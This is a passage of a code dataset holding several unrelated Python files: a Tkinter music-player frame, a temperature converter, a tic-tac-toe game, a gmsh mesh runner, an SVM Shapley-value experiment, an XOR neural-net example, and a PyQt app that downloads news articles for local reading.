sticky=\"NEWS\")\n self.frameDuree.columnconfigure(0, weight=1)\n self.frameDuree.rowconfigure(0, weight=1)\n\n def initFrameBoutonsG(self):\n self.frameBoutonsG = ttk.Label(self, style=\"Frame.TLabel\")\n self.buttonRepeat = ttk.Button(self.frameBoutonsG,\n text=\"R\", style = \"Default.TButton\",\n command=self.onzeHeure.lecteur.clicRepeat)\n self.buttonAlea = ttk.Button(self.frameBoutonsG,\n text=\"A\", style = \"Default.TButton\",\n command=self.onzeHeure.lecteur.clicAleatoire)\n self.buttonRepeat.grid(row=0, column=0, padx=5)\n self.buttonAlea.grid(row=0, column=1, padx=5)\n\n def initFrameBoutonsC(self):\n self.frameBoutonsC = ttk.Label(self, style=\"Frame.TLabel\")\n self.buttonPrec = ttk.Button(self.frameBoutonsC,\n text=\"|◄\", style = \"Default.TButton\",\n command=lambda : self.onzeHeure.lecteur.musiquePrec())\n self.buttonPause = ttk.Button(self.frameBoutonsC,\n text=\"| |\", style = \"Default.TButton\",\n command=lambda : self.onzeHeure.lecteur.pauseMusique())\n self.buttonPlay = ttk.Button(self.frameBoutonsC,\n text=\"►\", style = \"Default.TButton\",\n command=lambda : self.onzeHeure.lecteur.lireMusique())\n self.buttonSuiv = ttk.Button(self.frameBoutonsC,\n text=\"►|\", style = \"Default.TButton\",\n command=lambda : self.onzeHeure.lecteur.musiqueSuivante())\n self.buttonPrec.grid(row=0, column=0, padx=5)\n self.buttonPause.grid(row=0, column=1, padx=5)\n self.buttonPlay.grid(row=0, column=2, padx=5)\n self.buttonSuiv.grid(row=0, column=3, padx=5)\n\n def initFrameBoutonsD(self):\n self.frameBoutonsD = ttk.Label(self, style=\"Frame.TLabel\")\n self.buttonPlus = ttk.Button(self.frameBoutonsD,\n text=\" + \", style = \"Default.TButton\",\n command=self.clicProprio)\n self.buttonPlaylist = ttk.Button(self.frameBoutonsD,\n text=\"Listes de Lecture\", style = \"Default.TButton\",\n command=lambda : self.parent.frameCentre.afficher(\"FramePlaylist\"))\n self.buttonMusic = ttk.Button(self.frameBoutonsD,\n text=\"Musiques\", style = \"Default.TButton\",\n command=lambda : self.parent.frameCentre.afficher(\"FrameMusic\"))\n self.buttonPlus.grid(row=0, column=0, padx=5)\n self.buttonPlaylist.grid(row=0, column=1, padx=5)\n self.buttonMusic.grid(row=0, column=2, padx=5)\n\n def initGrid(self):\n self.frameDuree.grid(row=0, column=0, columnspan=3)\n self.frameBoutonsG.grid(row=1, column=0)\n self.frameBoutonsC.grid(row=1, column=1)\n self.frameBoutonsD.grid(row=1, column=2)\n\n #---------------------------------------------------------------------------\n # Actualisation\n #---------------------------------------------------------------------------\n\n def actualiserInfos(self):\n self.dureeVar.configure(text=self.onzeHeure.lecteur.getCurDuree(\n convertir=True))\n self.duree.configure(text=self.onzeHeure.lecteur.getDuree(\n convertir=True))\n\n def actualiserCurseur(self, position):\n self.scaleDuree.configure(value=position)\n\n def actualiserAleatoire(self):\n aleatoire = self.onzeHeure.lecteur.aleatoire\n if aleatoire != self.ancienAleatoire:\n self.ancienAleatoire = aleatoire\n if aleatoire: self.buttonAlea.configure(style=\"Actif.TButton\")\n else: self.buttonAlea.configure(style=\"Default.TButton\")\n\n def actualiserRepeat(self):\n repeat = self.onzeHeure.lecteur.repeat\n if repeat != self.ancienRepeat:\n self.ancienRepeat = repeat\n if repeat: self.buttonRepeat.configure(style=\"Actif.TButton\")\n else: self.buttonRepeat.configure(style=\"Default.TButton\")\n\n #---------------------------------------------------------------------------\n # Events\n #---------------------------------------------------------------------------\n\n def eventScale(self, event):\n # Appele quand mouvement scale\n self.onzeHeure.lecteur.deplacerCurseur(float(event))\n\n def resizeScale(self, event):\n # Quand changement taille de fenetre, modifier taille barre son\n longDurees = self.dureeVar.winfo_width()+self.duree.winfo_width()+40\n if self.scaleDureeLongueur < 2: self.scaleDureeLongueur += 1\n else: self.scaleDuree.configure(length=event.width-longDurees)\n\n def clicProprio(self):\n frameCentre = self.parent.frameCentre\n if frameCentre.lastFrame != \"FrameProprio\":\n frameCentre.frames[\"FrameProprio\"].actualiserInfos(None,\n musiqueEnCours=True)\n self.parent.frameCentre.afficher(\"FrameProprio\")\n","sub_path":"Frames/FrameBas.py","file_name":"FrameBas.py","file_ext":"py","file_size_in_byte":6616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"586219345","text":"import ui\n\nvalue1 = '0'\nvalue2 = '0'\nflgvalue = 0\n\ndef calc(sender):\n\tinput1 = sender.superview['textfield1'].text\n\tinput2 = sender.superview['textfield2'].text\n\tresult1 = sender.superview['textfield1']\n\tresult2 = sender.superview['textfield2']\n\tglobal value1\n\tglobal value2\n\tglobal flgvalue\n\t\n\tif input1 != value1 or flgvalue == 3:\n\t\tresult2.text = str(round((float(input1) * 1.8 + 32.0),1))\n\t\tvalue1 = input1\n\t\tvalue2 = float(input1) * 1.8 + 32.0\n\t\tflgvalue = 1\n\telif input2 != value2 or flgvalue == 4:\n\t\tresult1.text = str(round(((float(input2) - 32.0) / 1.8),1))\n\t\tvalue1 = (float(input2) - 32.0) / 1.8\n\t\tvalue2 = input2\n\t\tflgvalue = 2\n\ndef exchange(sender):\n\tglobal value1\n\tglobal value2\n\tglobal flgvalue\n\t\n\tif flgvalue == 1:\n\t\texvalue1 = sender.superview['textfield1'].text\n\t\texvalue2 = str(round(((float(exvalue1) - 32.0) / 1.8),1))\n\t\tsender.superview['textfield1'].text = exvalue2\n\t\tsender.superview['textfield2'].text = exvalue1\n\t\tvalue1 = exvalue2\n\t\tflgvalue = 4\n\telif flgvalue == 2:\n\t\texvalue2 = sender.superview['textfield2'].text\n\t\texvalue1 = str(round((float(exvalue2) * 1.8 + 32.0),1))\n\t\tsender.superview['textfield1'].text = exvalue2\n\t\tsender.superview['textfield2'].text = exvalue1\n\t\tvalue2 = exvalue1\n\t\tflgvalue = 3\n\tcalc(sender)\n\nv = ui.load_view()\nif min(ui.get_screen_size()) >= 768:\n\t# iPad\n\tv.frame = (0, 0, 360, 400)\n\tv.present('sheet')\nelse:\n\t# iPhone\n\tv.present(orientations=['portrait'])\n","sub_path":"CFconverter.py","file_name":"CFconverter.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"564182169","text":"def create_level():\n total = 1\n level = []\n success = False\n while not success:\n try:\n dimentions = int(input(\"Input dimension of the board: \"))\n if dimentions < 3:\n print(\"Not a valid dimension\")\n else:\n success = True\n except ValueError:\n print(\"Not a valid dimension\")\n\n for x in range(dimentions):\n temp_list = []\n for y in range(dimentions):\n temp_list.append(total)\n total += 1\n \n level.append(temp_list)\n return level\n\ndef update_level(level, player, choice):\n \n for x in level:\n for y in range(len(x)):\n if x[y] == choice:\n x[y] = player\n \n return level\n\ndef draw(level):\n for x in level:\n level_str = \"\"\n for y in x:\n level_str += \"{:>5} \".format(y)\n print(level_str)\n\ndef is_avaliable(choice, level):\n avaliable = False\n\n for x in level:\n for y in range(len(level)):\n if x[y] == choice:\n if x[y] != 'O' or x[y] != 'X':\n avaliable = True\n\n return avaliable\n\ndef get_choice(player, level):\n success = False\n \n while not success:\n try:\n choice = int(input(\"{} position: \".format(player)))\n if is_avaliable(choice, level):\n success = True\n return choice\n else:\n print(\"Illegal move!\")\n except ValueError:\n print(\"Input is not an intiger\")\n\ndef swap_player(player):\n if player == 'X':\n player = 'O'\n else:\n player = 'X'\n\n return player\n\ndef count_down(level, player, limit):\n counter = 0\n for x in range(len(level)):\n if counter == limit:\n return True\n\n counter = 0\n for y in level:\n if y[x] == player:\n counter += 1\n return False\n\ndef count_side(level, player, limit):\n counter = 0\n for x in level:\n if counter == limit:\n return True\n\n counter = 0\n for y in x:\n if y == player:\n counter += 1\n\n return False\n\ndef count_diagoal(level, player, limit):\n counter = 0\n for x in range(len(level)):\n temp_list = level[x]\n if temp_list[x] == player:\n counter += 1\n \n\n if counter == limit:\n return True\n\n else:\n y = 0\n counter = 0\n for x in range(len(level) - 1, -1, -1):\n temp_list = level[y]\n if temp_list[x] == player:\n counter += 1\n y += 1\n if counter == limit:\n return True\n\n return False\ndef is_victory(level, player):\n victory = False\n limit = len(level[1])\n\n if count_down(level, player, limit):\n victory = True\n elif count_side(level, player, limit):\n victory = True\n elif count_diagoal(level, player, limit):\n victory = True\n else:\n victory = False\n\n return victory\n\n\ndef main():\n victory = False\n player = 'O'\n level = create_level()\n remaining_turns = len(level)**2\n resault = \"\"\n\n while not victory:\n\n if remaining_turns > 0:\n \n player = swap_player(player)\n draw(level)\n choice = get_choice(player, level)\n level = update_level(level, player, choice)\n victory = is_victory(level, player)\n if victory:\n resault = \"Winner is: {}\".format(player)\n remaining_turns -= 1\n else:\n resault = \"Draw!\"\n break\n\n draw(level)\n print(resault)\n\n\nmain()","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"563441434","text":"\"\"\"Call gmsh to convert .geo file(s) into .msh, based derivative of MeshParameters\"\"\"\n\n#Standard library\nfrom __future__ import print_function, division #Python 2 compatibility\nimport os\nimport os.path as osp\nfrom subprocess import call\nimport sys\n\n#Site packages\n\n#Local\nimport folderstructure as FS\nimport common\n\n#Path to this code file (for dependency list)\nthisfile=sys.modules[__name__].__file__\n\n#Template for gmsh command\n#arguments: mshfile, geofile, txtfile\ncmd_tmpl=\"gmsh -0 -setstring meshmetafile %s -o %s %s >%s\"\n\nclass GmshRunner(common.ParameterSet):\n \"\"\"Subclass of common.ParameterSet for running gmsh on a .geo file to generate a .msh file and a mesh metadata file\n\n Attributes:\n \n To be read in:\n \n - meshname, geomdefname, tmplvalues as for buildgeom.MeshParameters\n \n To be generated by methods:\n \n - geofile = name of .geo file to run (not full path)\n - mshfile = name of output .msh file (not full path)\n - txtfile = name of text file to store gmsh message output (not full path)\n - meshmetafile = name of .yaml file to store mesh metadata\n \"\"\"\n __slots__=('meshname','geomdefname','tmplvalues','geofile','mshfile','txtfile','meshmetafile','_folders')\n _required_attrs=['meshname','geomdefname','tmplvalues']\n _config_attrs=_required_attrs\n #don't need sourcefile as input file due to config\n _inputfile_attrs=['geofile']\n _more_inputfiles=[thisfile,common.__file__]\n _outputfile_attrs=['mshfile','txtfile','meshmetafile']\n _taskname_src_attr='meshname'\n #Remember loaded geometry definitions so we aren't reading the same files over and over when generating multiple meshes\n loaded_geomdefs={}\n\n def __init__(self,**kwd):\n #Initialization from base class\n super(GmshRunner, self).__init__(**kwd)\n #Get folders\n self._folders={'geofile':osp.join(FS.geofolder,self.basename),\n 'mshfile':osp.join(FS.mshfolder,self.basename),\n 'txtfile':osp.join(FS.gmsh_outfolder,self.basename),\n 'meshmetafile':osp.join(FS.meshmeta_outfolder,self.basename)} \n #Get name of input and output files\n self.geofile=self.meshname+'.geo'\n self.mshfile=self.meshname+'.msh'\n self.txtfile=self.meshname+'.txt'\n self.meshmetafile=self.meshname+'.yaml'\n\n def run(self):\n print(self.mshfile)\n #Create directories if necessary\n for oattr in self._outputfile_attrs:\n if not osp.isdir(self._folders[oattr]):\n os.makedirs(self._folders[oattr])\n #Run the shell command\n cmd_str=cmd_tmpl%(self.full_path('meshmetafile'),self.full_path('mshfile'),self.full_path('geofile'),self.full_path('txtfile'))\n call(cmd_str,shell=True)\n #Error if the mesh metadata file was not generated\n assert osp.isfile(self.full_path('meshmetafile')), \"Mesh metadata file %s was not successfully generated.\"%self.full_path('meshmetafile')\n\n#Support command-line arguments\nif __name__ == '__main__':\n program_description='Create gmsh .msh file(s) from .geo file(s) by running gmsh from a yaml input file'\n input_file_description=\"\"\"Path to parameter definition file for the mesh\n This is a potentially multi-doc yaml file, where each document specifies one mesh to generate.\"\"\"\n \n common.run_cmd_line(program_description,input_file_description,GmshRunner)\n","sub_path":"NSF/Tom/src/geom_mk_msh.py","file_name":"geom_mk_msh.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"378214708","text":"import time\nimport random\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn import svm\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.manifold import TSNE\n\n# (539, 20)\n#加载数据\ndef loadTraindata(str):\n f = open(str, encoding='utf-8')\n sentimentlist = []\n for line in f:\n s = line.replace('?', 'NaN').strip().split(',')\n sentimentlist.append(s)\n f.close()\n dt = np.array(sentimentlist)\n return dt\n\n#预处理训练集\ndef preprocessTrainData(dt):\n train_siz = int (dt.shape[0])\n X = dt[:, 0:19]\n y = dt[:, -1]\n Y = [0 if ((i == 'noband') or (i=='0')) else 1 for i in y]\n\n imp = Imputer(missing_values='NaN', strategy='mean', axis=0)\n imp.fit(X)\n X = imp.transform(X)\n X_train = X[0:train_siz, :]\n Y_train = Y[0:train_siz]\n\n # 随机抽样\n random.seed(5)\n sample_list = random.sample(range(0, train_siz), train_siz)\n\n x_t = [X_train[i] for i in sample_list]\n y_t = [Y_train[i] for i in sample_list]\n\n return X_train,Y_train\n\n#预测处理 测试集\ndef preprocessTestData():\n f = open(r'C:\\Users\\smh\\Desktop\\论文\\bands_test.dat', encoding='utf-8')\n sentimentlist = []\n for line in f:\n s = line.replace('?', 'NaN').strip().split(',')\n sentimentlist.append(s)\n f.close()\n dt = np.array(sentimentlist)\n\n X = dt[:, 0:19]\n y = dt[:, -1]\n Y = [0 if i == 'noband' else 1 for i in y]\n\n imp = Imputer(missing_values='NaN', strategy='mean', axis=0)\n imp.fit(X)\n X = imp.transform(X)\n return X,Y\n\n# 预测\ndef predict(x_t,y_t,X_test,Y_test):\n clf = svm.SVC(C=1, kernel='poly', max_iter=4)\n clf.fit(x_t, y_t)\n result = clf.predict(X_test)\n rate = clf.score(X_test, Y_test)\n #print(result)\n #print(Y_test)\n #print(clf.score(X_test, Y_test))\n # result = clf.predict([[40.0,65,0.2,15.0,80,0.625,50,10.4,1640,47.2,42.4,1.0,0.0,3.0,1.5,32.0,40,103.13,100]])\n # print(result)\n return rate\n\n\n# 对样本进行预处理并画图\ndef plot_embedding(data, label, title):\n # \"\"\"\n # :param data:数据集\n # :param label:样本标签\n # :param title:图像标题\n # :return:图像\n # \"\"\"\n x_min, x_max = np.min(data, 0), np.max(data, 0)\n data = (data - x_min) / (x_max - x_min) # 对数据进行归一化处理\n fig = plt.figure() # 创建图形实例\n ax = plt.subplot(111) # 创建子图\n # 遍历所有样本\n print(\"data shape:\",data.shape)\n for i in range(data.shape[0]):\n # 在图中为每个数据点画出标签\n plt.text(data[i, 0], data[i, 1], str(label[i]), color=plt.cm.Set1((label[i]+3) / 10),\n fontdict={'weight': 'bold', 'size': 7})\n plt.xticks() # 指定坐标的刻度\n plt.yticks()\n plt.title(title, fontsize=14)\n # 返回值\n return fig\n\ndef drawPicture(data,label):\n # 画图\n ts = TSNE(n_components=2, init='pca', random_state=0)\n reslut = ts.fit_transform(data)\n # 调用函数,绘制图像\n fig = plot_embedding(reslut, label, 't-SNE Embedding of digits')\n # 显示图像\n plt.show()\n\ndef shapley(a,b,c,ab,ac,bc,abc):\n #a-b-c\n #x1=(a)+(ab-a)+(abc-ab)\n a1 = a\n b1 = ab-a\n c1 = abc-ab\n #a-c-b\n #x2=(a)+(ac-a)+(abc-ac)\n a2 = a\n b2 = ac-a\n c2 = abc-ac\n\n #b-c-a\n #x3=(abc-bc)+(b)+(bc-b)\n a3 = abc-bc\n b3 = b\n c3 = b\n\n #b-a-c\n #x4=(ab-b)+(b)+(abc-ab)\n a4 = ab-b\n b4 = b\n c4 = abc-ab\n\n #c-b-a\n #x5=(abc-bc)+(bc-c)+(c)\n a5 = abc-bc\n b5 = bc-c\n c5 = c\n\n #c-a-b\n #x6=(ac-c)+(abc-ac)+(c)\n a6 = ac-c\n b6 = abc-ac\n c6 = c\n print(\"a1----a6\",a1,a2,a3,a4,a5,a6)\n print(\"b1----b6\",b1,b2,b3,b4,b5,b6)\n print(\"c1----c6\",c1,c2,c3,c4,c5,c6)\n\n A = (a1+a2+a3+a4+a5+a6)/6\n B = (b1+b2+b3+b4+b5+b6)/6\n C = (c1+c2+c3+c4+c5+c6)/6\n\n return A,B,C\n\n#获得训练的准确率\ndef getTrainRate(str):\n dt = loadTraindata(str)\n x_t, y_t = preprocessTrainData(dt)\n X_test, Y_test = preprocessTestData()\n\n result = predict(x_t, y_t, X_test, Y_test)\n #drawPicture(x_t,y_t)\n return result\n\n#对比实验1\ndef radomDate1():\n a = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文\\bands5.dat')\n b = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文\\bands6.dat')\n c = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文\\bands4.dat')\n ab = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文\\bands3.dat')\n ac = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文\\bands7.dat')\n bc = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文\\bands8.dat')\n abc = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文\\bands2.dat')\n print(\"对比实验1:----------------------------\")\n print(\"rate\", a, b, c, ab, ac, bc, abc)\n a, b, c = shapley(a, b, c, ab, ac, bc, abc)\n print('shapley value =', a, b, c)\n\n#对比实验2\ndef radomDate2():\n a = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsA.dat')\n b = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsB.dat')\n c = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsC.dat')\n ab = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsAB.dat')\n ac = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsAC.dat')\n bc = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsBC.dat')\n abc = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsABC.dat')\n print(\"对比实验2:----------------------------\")\n print(\"rate\", a, b, c, ab, ac, bc, abc)\n a, b, c = shapley(a, b, c, ab, ac, bc, abc)\n print('shapley value =', a, b, c)\n\n\nif __name__ == '__main__':\n time_start = time.time()\n #a = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsABC.dat')\n #b = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsB.dat')\n #c = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsC.dat')\n #radomDate1()\n #radomDate2()\n a, b, c =shapley(0.71, 0.53, 0.42, 0.82, 0.78, 0.64, 0.92)\n print('shapley value =', a, b, c)\n time_end = time.time()\n print('totally cost', time_end - time_start, '秒')\n","sub_path":"classification/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":5977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"199208331","text":"import sys\nsys.path.append(\"../..\")\nimport time\nimport numpy as np\n\nfrom lightenn import neuralnet\nfrom lightenn import types\n\ndef load_training_data(path):\n\n training_x = []\n training_y = []\n\n with open(path, 'r') as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n t = line.split(',')\n training_x.append(t[0:len(t)-1])\n training_y.append(t[len(t)-1:len(t)])\n\n assert (len(training_x) > 0), 'Error: empty training set.'\n\n return (np.array(training_x, dtype=np.float),\n np.array(training_y, dtype=np.float))\n\ndef split_validation(training_x, training_y, val_perc):\n split_idx = int((1.0-val_perc)*len(training_x))\n return (training_x[0:split_idx], training_y[0:split_idx],\n training_x[split_idx:len(training_x)], training_y[split_idx:len(training_y)])\n\n# Hyperparams\nnum_epochs = 10\nlearning_rate = 1.0\n\n# For selecting random weights and biases\nmu = 0.0\nstddev = 1.0\n\n# Percentage of validation data\nval_perc = 0.2\n\n# Load training and validation sets\ntraining_x, training_y = load_training_data('./data/xor_data.csv')\ntraining_x, training_y, validation_x, validation_y = split_validation(training_x, training_y, val_perc)\n\n# Stabilize randomness\nnp.random.seed(123)\n\n# Build neural net\nnn = neuralnet.NeuralNet()\nnn.add_input(2)\nnn.add_fully_connected(3, activation_type=types.ActivationType.SIGMOID)\nnn.add_output(1, activation_type=types.ActivationType.SIGMOID)\nnn.initialize(loss_type=types.LossType.CROSS_ENTROPY, learning_rate=learning_rate, mu=mu, stddev=stddev)\n\n# Numerical gradient check\nnn.check_gradients(delta=0.00001)\n\n# Train in SGD mode\nt_0 = time.time()\nnn.train_sgd((training_x, training_y), num_epochs, validation_set=(validation_x, validation_y))\nt_1 = time.time()\ntot_time = round(t_1 - t_0, 2)\nprint('Total time (in seconds):', tot_time)\n\n# Predict. Remember that the output logit is a sigmoid - we must round\n# to get the prediction value\nprint('0 XOR 0:', np.round(nn.predict(np.array([[0,0]], dtype=np.float))))\nprint('0 XOR 1:', np.round(nn.predict(np.array([[0,1]], dtype=np.float))))\nprint('1 XOR 0:', np.round(nn.predict(np.array([[1,0]], dtype=np.float))))\nprint('1 XOR 1:', np.round(nn.predict(np.array([[1,1]], dtype=np.float))))\n\n# Batch-predict several inputs at once.\nprint(np.round(nn.predict(np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.float))))\n","sub_path":"usage_examples/toy_examples/logical_xor.py","file_name":"logical_xor.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"634757400","text":"#!/usr/bin/Python3\n\nimport math\n\nclass parameter:\n\n # Define all parameters needed in code\n # Rover Parameters\n n_rovers = 12 # Number of Rovers in Simulation\n n_poi = 10 # Number of POIs on map\n rover_vel = 1.0 # Rover velocity in units/s\n\n # Domain parameters\n x_dim = 30 # X dimension of map\n y_dim = 30 # Y dimension of map\n obs_rad = 100 # How far away POIs can be detected (high number is full observability)\n coupling = 3 # Number of agents needed to view a POI for reward\n act_dist = 4 # Range at which rovers can sucessfully observe POI\n angle_res = 90 # Angle resolution determines numbr of quadrants for sensors 360/Angle\n pd_scale = 0.8 # Multiplier for minimum distance POIs must be from each other\n rv_scale = 1.5 # Multiplier for minimum distance POIs must be from nearest rover\n max_p_val = 5 # Maximum value a POI can be\n\n # Neural Network Parameters\n n_inputs = 8 # Number of NN inputs\n n_outputs = 2 # Number of NN outputs\n n_hidden = 9 # Number of nodes in hidden layer\n\n # CCEA Parameters\n epsilon = 0.9 # For epsilon greedy parent selection\n pop_size = 20 # Size of each population in CCEA\n p_mut = 0.1 # Probability of mutation occuring\n percent_mut = 0.1 # Percentage of bits in policy which are mutated\n n_bits = math.floor(math.log(100, 2)) + 1 + 1 # The number of bits needed to express a single weight\n # The extra bit is used to determine if a weight is negative or positive\n\n # Simulation Parameters\n reward_id = 2 # 0 for global, 1 for difference, 2 for D++\n use_coords = True # True means import rover and poi positions from txt file, False means make new txt file\n generations = 1000 # Number of evolutionary generations\n n_time_steps = 30 # Number of time steps agents can move for policy evals (each time step is 1 s)\n stat_runs = 10 # Number of statistical runs\n asserts_on = False # Turns assert statements on (True) or off (False)\n graphs_on = False # Turns graphs on (True) or off (False)\n\n # Visualizer\n scale_factor = 30\n visualizer_on = False # Turns visualizer on (True) or off (False)\n trail_on = True # path trail for all the agents\n visualize_only_last_generation = True # Visualizes only last generation's if True, else every Generation\n save_episode = True # this saves the last generation's performance images\n","sub_path":"parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"409523883","text":"\"\"\"\nCreated on Mon Jul 20 14:06:36 2020\n\n@author: tfinney\n\nmain file for read the bee for free!\n\"\"\"\n\n\n# from fbs_runtime.application_context.PyQt5 import ApplicationContext\n# from PyQt5.QtWidgets import QMainWindow\n\n# import sys\n\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import QDateTime, Qt, QTimer, pyqtSlot\nfrom PyQt5 import QtGui\nimport os\nimport string\nimport random\nimport urllib.request\nimport webbrowser\nimport glob\nimport platform\nimport subprocess\nimport sys\nimport shutil\n\nimport fetch_news as fn\n\nclass mainWindow(QMainWindow):\n def __init__(self, *args, **kwargs):\n super(mainWindow, self).__init__(*args, **kwargs)\n \n self.statusBar = QStatusBar()\n self.setStatusBar(self.statusBar)\n self.statusBar.showMessage('Normal')\n self.initial_setup()\n \n self.setWindowTitle('Read the Bee for Free!')\n self.center()\n self.setMinimumSize(500,100)\n \n testLabel = QLabel('Read The Bee For Free!') \n \n self.urlLine = QLineEdit('')\n self.urlLine.setPlaceholderText('enter a url...')\n self.urlLine.setDragEnabled(True)\n self.urlLine.setToolTip('Enter the url of the news article you want to read.')\n \n urlButton = QPushButton('Download')\n urlButton.setToolTip('Download the article to the data directory.')\n \n viewButton = QPushButton('Download and Read') \n viewButton.setToolTip('Download the article and open it in the default web browser.')\n\n deleteButton = QPushButton('Delete Local Data')\n deleteButton.setToolTip('Delete the local html files created by the program.')\n \n openFolderButton = QPushButton('Open Data Directory')\n openFolderButton.setToolTip('Opens the folder on your machine where we are downloading things!')\n \n clear_url_button = QPushButton('Clear')\n clear_url_button.setToolTip('clear the current url')\n\n mainLayout = QVBoxLayout() \n \n urlLayout = QHBoxLayout()\n # urlLayout.addWidget(urlLabel)\n urlLayout.addWidget(self.urlLine)\n urlLayout.addWidget(clear_url_button)\n \n buttonLayout = QHBoxLayout()\n buttonLayout.addWidget(urlButton)\n buttonLayout.addWidget(viewButton)\n buttonLayout.addWidget(deleteButton)\n \n bottomButtonLayout = QHBoxLayout()\n bottomButtonLayout.addWidget(openFolderButton)\n bottomButtonLayout.addStretch()\n \n labelLayout = QHBoxLayout()\n labelLayout.addStretch()\n labelLayout.addWidget(testLabel)\n labelLayout.addStretch()\n \n mainLayout.addLayout(labelLayout)\n mainLayout.addLayout(urlLayout)\n mainLayout.addLayout(buttonLayout)\n# \n\n # self.output_box = QTextBrowser()\n self.output_box = QTextEdit()\n self.output_box.resize(1,1)\n # self.output_box.text('test')\n self.output_box.setReadOnly(True)\n self.output_box.append('Ready!')\n mainLayout.addWidget(self.output_box)\n mainLayout.addLayout(bottomButtonLayout)\n \n\n widget = QWidget()\n widget.setLayout(mainLayout)\n \n\n \n \n \n \n self.setCentralWidget(widget)\n # testButton.clicked.connect(self.test_slot_n_signal)\n \n \n #connections\n urlButton.clicked.connect(self.gen_and_fetch)\n viewButton.clicked.connect(self.fetch_and_open_in_browsah)\n deleteButton.clicked.connect(self.delete_local_data)\n openFolderButton.clicked.connect(self.open_folder)\n clear_url_button.clicked.connect(self.clear_url)\n\n \n def initial_setup(self):\n current_working_dir = os.getcwd()\n self.data_dir = current_working_dir + '/rtbff_data/'\n self.setup_directories()\n \n #check to see if we have wget\n if platform.system() =='Windows':\n if shutil.which('wsl') == None:\n self.statusBar.showMessage('Warning, no wsl/wget found!')\n else:\n self.statusBar.showMessage('using wsl wget...')\n \n # if platform.system() =='Linux':\n else:\n if shutil.which('wget') == None:\n self.statusBar.showMessage('Warning: No wget detected, you may have problems...')\n else:\n # pass\n self.statusBar.showMessage('Using GNU wget')\n \n \n def clear_url(self):\n self.urlLine.setText('')\n \n def setup_directories(self):\n data_dir = self.data_dir\n \n if( os.path.exists(data_dir) == False):\n os.mkdir(data_dir) \n \n \n def center(self):\n \"\"\"\n center the main window\n \"\"\"\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp) \n self.move(qr.topLeft())\n \n \n def delete_local_data(self):\n \"\"\"\n clean up our data file if we want\n \"\"\"\n \n choice = QMessageBox.question(self,'delete?','Delete Local Data?', QMessageBox.Yes | QMessageBox.No)\n\n if choice == QMessageBox.Yes:\n self.output_box.append('Deleting Local files.')\n local_z = glob.glob(self.data_dir+'*.html')\n for i in range(len(local_z)):\n os.remove(local_z[i])\n else:\n pass\n\n \n def open_folder(self):\n path = self.data_dir\n if platform.system() == \"Windows\":\n os.startfile(path)\n elif platform.system() == \"Darwin\":\n subprocess.Popen([\"open\", path])\n else:\n subprocess.Popen([\"xdg-open\", path])\n\n def test_slot_n_signal(self):\n print('you clicked the piss button')\n \n def generate_out_file(self):\n base_name = ''.join(random.choices(string.hexdigits,k=10))\n full_name = self.data_dir + base_name + '.html'\n return full_name\n # print(full_name)\n \n \n\n \n def fetch_a_url(self,url,out_file):\n self.statusBar.showMessage('using wget...')\n if url.find('sacbee') !=-1:\n self.statusBar.showMessage('using urllib for sacbee...',10)\n self.output_box.append('Fetching directly with urllib lib (sacbee)')\n real_url = fn.decompose_sacbee(url)\n self.output_box.append(('True sacbee url is: {}'.format(real_url)))\n try:\n fn.fetch_url_liar(real_url, out_file)\n except:\n self.output_box.append('error fetching file...')\n pass\n \n else:\n try:\n fn.fetch_wget(url,out_file)\n except:\n try:\n self.statusBar.showMessage('using urllib...',10)\n self.output_box.append('Error with wget, trying with urllib...')\n # print('error with wget, trying with urllib...')\n fn.fetch_url_liar(url,out_file)\n except:\n self.output_box.append('error fetching file...')\n pass \n \n \n def gen_and_fetch(self):\n # print(self.urlLine.text())\n if(self.urlLine.text()==''):\n # self.statusBar.showMessage('url cannot be blank!')\n self.output_box.append('url cannot be blank!')\n return None\n else:\n to_fetch_url = self.urlLine.text()\n local_name = self.generate_out_file()\n self.output_box.append('Downloading: {}\\nTo: {}'.format(to_fetch_url,local_name))\n # print(to_fetch_url)\n # print(type(to_fetch_url))\n # self.fetchURL(str(to_fetch_url),local_name)\n self.fetch_a_url(str(to_fetch_url),local_name)\n self.output_box.append('Done!')\n \n return local_name\n\n def 